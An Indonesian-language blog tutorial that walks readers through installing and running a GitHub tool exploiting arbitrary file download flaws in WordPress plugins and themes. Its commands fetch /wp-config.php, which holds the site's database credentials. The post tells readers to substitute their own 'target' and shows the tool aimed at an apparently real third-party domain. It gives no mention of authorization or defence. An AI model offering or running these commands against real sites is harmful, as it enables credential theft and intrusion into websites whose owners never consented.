-
Hai sobat.
Saya ikal,
Disini saya akan share sebuah script python keren nih
-
Sesuai judul, jadi kali ini kita akan membahas arbitrary file download lagi.
Jadi script ini dibuat oleh MrCl0wnLab dan sudah ada digithub. Dan ini berimpak kepada semua plugins dan themes wordpress yang rentan terhadap arbitrary file download.
Langsung saja kita masuk ketahap pembahasan.
1. Tahap penginstalan.
Pertama kita akan mencoba clone link githubnya ke terminal kita masing-masing.
$apt update && apt upgrade && pkg install git python -y
$git clone https://github.com/MrCl0wnLab/afdWordpress && cd afdWordpress && pip install requests
Sekarang kita jalankan toolsnya.
$python afd.py --url https://localhost/ --threads 50 --file /wp-config.php
Ganti https://localhost/ dengan target wordpress kalian.
$python afd.py --url https://hsvhospitality.com --threads 50 --file /wp-config.php
Tampilan saat tools beroperasi :
Ada beberapa HTTP respon yang muncul saat menjalankan tools ini. Jika exploit berhasil maka baris exploit yang berhasil akan berwarna hijau dan muncul 200
Yup! Segini aja.
Thanks
See u